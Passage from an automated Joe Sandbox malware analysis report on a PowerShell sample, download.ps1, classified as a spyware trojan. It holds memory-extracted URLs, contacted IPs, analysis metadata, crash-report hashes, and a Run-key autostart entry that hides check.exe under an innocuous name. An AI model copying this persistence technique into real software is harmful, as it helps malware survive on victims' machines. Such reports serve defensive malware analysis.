https://github.com/urllib3/urllib3/issues/2168	check.exe, 00000005.00000003.2372928335.00000183553FB000.00000004.00000020.00020000.00000000.sdmp	false
https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip	check.exe, 00000005.00000002.2590928107.0000018356520000.00000004.00001000.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file	check.exe, 00000005.00000002.2580123752.0000018354EE0000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.dhimyotis.com/certignarootca.crlU4	check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	false
http://goo.gl/zeJZl.	check.exe, 00000005.00000002.2586615766.0000018355C60000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	check.exe, 00000005.00000003.2373665758.0000018355377000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
http://repository.swisssign.com/_	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/entry-points/#file-format	check.exe, 00000005.00000002.2580123752.0000018354EE0000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	check.exe, 00000005.00000002.2582703393.0000018355720000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digi	check.exe, 00000004.00000003.2680794042.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp	false
https://peps.python.org/pep-0205/	check.exe, 00000005.00000003.2355598395.0000018354B71000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580656431.0000018355100000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.dhimyotis.com/certignarootca.crl	check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	false
http://curl.haxx.se/rfc/cookie_spec.html	check.exe, 00000005.00000003.2375078159.00000183555F7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2585634038.0000018355A70000.00000004.00001000.00020000.00000000.sdmp	false
http://ocsp.accv.es	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/3020	check.exe, 00000005.00000003.2372928335.00000183553FB000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2345627693.000002C4AD6F1000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	check.exe, 00000005.00000002.2579119123.0000018354960000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	check.exe, 00000005.00000002.2582878970.0000018355840000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	check.exe, 00000005.00000002.2579119123.00000183549E4000.00000004.00001000.00020000.00000000.sdmp	false
https://httpbin.org/get	check.exe, 00000005.00000002.2585634038.0000018355B58000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554D3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554FF000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2345627693.000002C4AF241000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	check.exe, 00000005.00000002.2579119123.0000018354960000.00000004.00001000.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 00000000.00000002.2345627693.000002C4AEAF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2345627693.000002C4AEB6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2345627693.000002C4AE1D4000.00000004.00000800.00020000.00000000.sdmp	false
https://wwww.certigna.fr/autorites/0m	check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	check.exe, 00000005.00000003.2359335360.0000018354B9F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2359885124.0000018354B9A000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2359077930.0000018354B96000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2361214283.0000018354B89000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/issues/86361.	check.exe, 00000005.00000003.2363762989.000001835509A000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2362778293.000001835507F000.00000004.00000020.00020000.00000000.sdmp	false
http://mail.python.org/pipermail/python-dev/2012-June/120787.html.	check.exe, 00000005.00000002.2585634038.0000018355A70000.00000004.00001000.00020000.00000000.sdmp	false
https://httpbin.org/	check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
https://wwww.certigna.fr/autorites/	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	check.exe, 00000005.00000002.2579119123.0000018354960000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	check.exe, 00000005.00000002.2579119123.0000018354960000.00000004.00001000.00020000.00000000.sdmp	false
http://www.color.org)	check.exe, 00000005.00000002.2598607566.00007FFD897AA000.00000002.00000001.01000000.00000024.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp	false
http://repository.swisssign.com/x	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata	check.exe, 00000005.00000002.2583654666.0000018355940000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.securetrust.com/STCA.crl	check.exe, 00000005.00000003.2415314317.00000183555DD000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183555DD000.00000004.00000020.00020000.00000000.sdmp	false
http://wwwsearch.sf.net/):	check.exe, 00000005.00000003.2375078159.00000183555F7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554B2000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/legislacion_c.htm	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	check.exe, 00000005.00000002.2583654666.0000018355940000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.xrampsecurity.com/XGCA.crl0	check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.2345627693.000002C4AD916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2345627693.000002C4AF241000.00000004.00000800.00020000.00000000.sdmp	false
http://www.cert.fnmt.es/dpcs/	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail	check.exe, 00000005.00000002.2581028850.0000018355494000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554FF000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375554311.00000183554FB000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	check.exe, 00000005.00000002.2582878970.0000018355840000.00000004.00001000.00020000.00000000.sdmp	false
http://www.accv.es00	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	check.exe, 00000005.00000002.2653958490.00007FFD8B608000.00000002.00000001.01000000.0000000A.sdmp	false
http://ocsp.accv.esiE	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	check.exe, 00000005.00000002.2582703393.0000018355720000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	check.exe, 00000005.00000003.2375173777.0000018354F20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018354EE0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375554311.00000183554FB000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	check.exe, 00000005.00000003.2409464114.0000018355052000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018355052000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018355052000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/legislacion_c.htmb~	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://mahler:8092/site-updates.py	check.exe, 00000005.00000003.2375078159.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375742957.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375766631.0000018355624000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.securetrust.com/SGCA.crl	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
http://.../back.jpeg	check.exe, 00000005.00000002.2585634038.0000018355A70000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355546000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	check.exe, 00000005.00000003.2372124861.0000018354F84000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2372480744.0000018355454000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/post	check.exe, 00000005.00000003.2372540922.0000018354FEA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354FCE000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018354FC7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2373391380.0000018354FDB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354FC7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2371318257.0000018354FEA000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	check.exe, 00000005.00000002.2579119123.00000183549E4000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Ousret/charset_normalizer	check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
http://www.firmaprofesional.com/cps0	check.exe, 00000005.00000003.2409464114.0000018355052000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018354EE0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2417169595.00000183556CE000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018355052000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	check.exe, 00000005.00000002.2579119123.0000018354960000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	check.exe, 00000005.00000002.2583654666.0000018355940000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	check.exe, 00000005.00000003.2359335360.0000018354B9F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2359885124.0000018354B9A000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2359077930.0000018354B96000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2361214283.0000018354B89000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	check.exe, 00000005.00000002.2581028850.0000018355494000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554FF000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375554311.00000183554FB000.00000004.00000020.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	check.exe, 00000005.00000002.2580123752.0000018354F8E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354F93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354F93000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	check.exe, 00000005.00000002.2581028850.00000183554D3000.00000004.00000020.00020000.00000000.sdmp	false
http://www.quovadisglobal.com/cps0	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	check.exe, 00000005.00000002.2582878970.0000018355840000.00000004.00001000.00020000.00000000.sdmp	false
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	check.exe, 00000005.00000002.2580123752.0000018354F8E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354F93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354F93000.00000004.00000020.00020000.00000000.sdmp	false
https://requests.readthedocs.io	check.exe, 00000005.00000002.2586615766.0000018355BA0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.2372540922.0000018354FEA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354FCE000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018354FC7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2373391380.0000018354FDB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354FC7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2371318257.0000018354FEA000.00000004.00000020.00020000.00000000.sdmp	false
http://repository.swisssign.com/	check.exe, 00000005.00000002.2581028850.0000018355588000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355541000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355556000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.xrampsecurity.com/XGCA.crl	check.exe, 00000005.00000003.2415314317.00000183555DD000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183555DD000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org	check.exe, 00000005.00000003.2372540922.0000018354FEA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354FCE000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018354FC7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2373391380.0000018354FDB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354FC7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2371318257.0000018354FEA000.00000004.00000020.00020000.00000000.sdmp	false
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/	check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
http://www.accv.es/legislacion_c.htm0U	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
http://www.aiim.org/pdfa/ns/id/	check.exe, 00000005.00000002.2598607566.00007FFD897AA000.00000002.00000001.01000000.00000024.sdmp	false
http://ocsp.accv.es0	check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/	check.exe, 00000005.00000003.2375078159.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2417169595.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.0000018355612000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375742957.0000018355613000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375766631.0000018355624000.00000004.00000020.00020000.00000000.sdmp	false
https://json.org	check.exe, 00000005.00000002.2581028850.00000183554D3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2580123752.0000018355052000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de1	check.exe, 00000005.00000003.2359335360.0000018354B9F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2359885124.0000018354B9A000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2359077930.0000018354B96000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2361214283.0000018354B89000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/howto/mro.html.	check.exe, 00000005.00000002.2579937758.0000018354DE0000.00000004.00001000.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package	check.exe, 00000005.00000002.2579119123.0000018354960000.00000004.00001000.00020000.00000000.sdmp	false
https://twitter.com/	check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp	false
https://stackoverflow.com/questions/4457745#4457745.	check.exe, 00000005.00000002.2590928107.00000183564A0000.00000004.00001000.00020000.00000000.sdmp	false
http://www.quovadisglobal.com/cps	check.exe, 00000005.00000003.2415314317.00000183555DD000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183555DD000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module	check.exe, 00000005.00000002.2579119123.00000183549E4000.00000004.00001000.00020000.00000000.sdmp	false
https://google.com/	check.exe, 00000005.00000002.2581028850.0000018355494000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.000001835534C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2581028850.00000183554FF000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375554311.00000183554FB000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail/	check.exe, 00000005.00000002.2581028850.00000183553FB000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/mail/	check.exe, 00000005.00000002.2580123752.0000018354F8E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2409464114.0000018354F93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2375173777.0000018354F93000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/3290	check.exe, 00000005.00000002.2583654666.0000018355940000.00000004.00001000.00020000.00000000.sdmp	false
https://www.openssl.org/H	check.exe, 00000005.00000002.2613803274.00007FFD8A9A4000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2664683812.00007FFD93330000.00000002.00000001.01000000.0000001B.sdmp	false
http://crl.certigna.fr/certignarootca.crl01	check.exe, 00000005.00000002.2581028850.0000018355695000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355695000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2345627693.000002C4AD6F1000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.22.46	nodejs.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572542
Start date and time:	2024-12-10 17:09:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	download.ps1
Detection:	MAL
Classification:	mal72.troj.spyw.evad.winPS1@39/433@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 61% Number of executed functions: 65 Number of non-executed functions: 399
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 52.149.20.212, 20.190.181.5
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: download.ps1

Simulations

Behavior and APIs

Time	Type	Description
11:10:14	API Interceptor	43x Sleep call for process: powershell.exe modified
11:10:32	API Interceptor	3x Sleep call for process: check.exe modified
11:10:34	API Interceptor	3x Sleep call for process: WMIC.exe modified
11:10:47	API Interceptor	3x Sleep call for process: WerFault.exe modified
17:10:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
17:10:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_5ca130b0-7a2e-4261-afa6-0e80c9f448ba\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.368112785506168
Encrypted:	false
SSDEEP:	192:fPI6Qi0PRjijoR38T8c8M8p78r8d818S8v8/8Yt8F8o8i8A8h818aH8/8k8w8d81:nI9pPRjijM3wnhURzuiF0Y4lO89X
MD5:	6E13ED77B447D1DAEE892C897D83FEC9
SHA1:	818E3904503C41C484CE1C639672C4668578E56F
SHA-256:	253DBA4FB0A1489AD4B0771EB58EC4D1ED0D561176BC36F50914CCDB5F54714E
SHA-512:	8FB5EC9262DDA03DBD04AE1A77B047937F86BAB16C7F74F27BAC9F5C7B617994D6C3AB5591234AA20A9ABCE41057DBE8C60ACC2CCCF0BD338B15F3B38117E65D
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.0.6.5.1.9.6.2.1.4.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.0.6.5.4.4.4.6.5.1.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.c.a.1.3.0.b.0.-.7.a.2.e.-.4.2.6.1.-.a.f.a.6.-.0.e.8.0.c.9.f.4.4.8.b.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.d.e.3.6.f.0.-.0.5.8.a.-.4.c.d.3.-.9.6.4.b.-.2.1.0.2.4.7.b.9.5.2.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.0.-.0.0.0.1.-.0.0.1.5.-.6.7.c.0.-.9.9.0.d.1.e.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_cd14b44a-584f-4fc5-a949-dd7151309e0b\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3677645889588073
Encrypted:	false
